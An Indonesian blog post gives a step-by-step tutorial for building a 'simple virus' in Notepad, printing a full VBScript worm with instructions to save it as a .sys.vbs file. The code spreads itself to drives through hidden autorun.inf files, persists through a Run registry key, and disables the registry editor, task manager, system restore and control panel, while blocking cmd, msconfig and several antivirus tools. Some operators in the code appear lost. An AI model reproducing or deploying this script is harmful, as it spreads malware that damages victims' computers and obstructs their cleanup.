Popular Posts :
Home » , » MAKE VIRUS with Notepad

MAKE VIRUS with Notepad

Rabu, 23 Maret 2011 | 0 komentar

Akhirnya bisa posting lagi nih...!!!
Kali ini aku mau posting cara buat virus sederhana melalui NOTEPAD...!!!


Efek virus yang akan saya ajarkan ini sebenarnya gak terlalu mengerikan...,
Efeknya cuma regedit gak bisa dibuka dan muncul gambar acak di menu properties serta bisa membuat "kaspersky versi 7 ke atas menjerit-jerit" pastinya...,
hahahaha...!!!


tapi cukuplah sebagai bahan pembelajaran buat para pemula...!!!
hehehe...!!! ( Sebenarnya aku juga Newbiee sih )


Oke langsung saja ikuti perintah dibawah ini...!!!


1. Buka Notepad
2. Copy kan kode dibawah ini :


on error resume next


dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd


isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”


set longka = createobject(“Scripting.FileSystemObject”)


set mf = longka.getfile(Wscript.ScriptFullname)


dim text,size


size = mf.size


check = mf.drive.drivetype


set text = mf.openastextstream(1,-2)


do while not text.atendofstream


rekur = rekur & text.readline


rekur = rekur & vbcrlf


loop


do


Set windowpath = longka.getspecialfolder(0)


Set syspath = longka.getspecialfolder(1)


set tf = longka.getfile(syspath & “\recycle.vbs”)


tf.attributes = 32


set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)


tf.write rekur


tf.close


set tf = longka.getfile(syspath & “\recycle.vbs”)


tf.attributes = 39


for each desades in longka.drives


If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then


set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)


tf.attributes =32


set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)


tf.write rekur


tf.close


set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)


tf.attributes = 39


set tf =longka.getfile(desades.path &”\autorun.inf”)


tf.attributes = 32


set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)


tf.write isi


tf.close


set tf = longka.getfile(desades.path &”\autorun.inf”)


tf.attributes=39


end if


next


set F0nAb0530 = createobject(“WScript.Shell”)


F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″


F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″


F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”


F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“


F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“


if check 1 then


Wscript.sleep 200000


end if


loop while check 1


set sd = createobject(“Wscript.shell”)


sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname


3. Simpan dengan nama virus.sys.vbs / dengan nama yang lain tapi tetap berekstensi .sys.vbs
Share this article :

0 komentar:

Posting Komentar

 
Support : Indonesia Blogger | Eggy Prayogia Adistira | The Prayogia
| SUHE
Copyright © 2012. Eprayogia - All Rights Reserved
Template Modify by Eprayogia
Proudly powered by Eggy Prayogia Adistira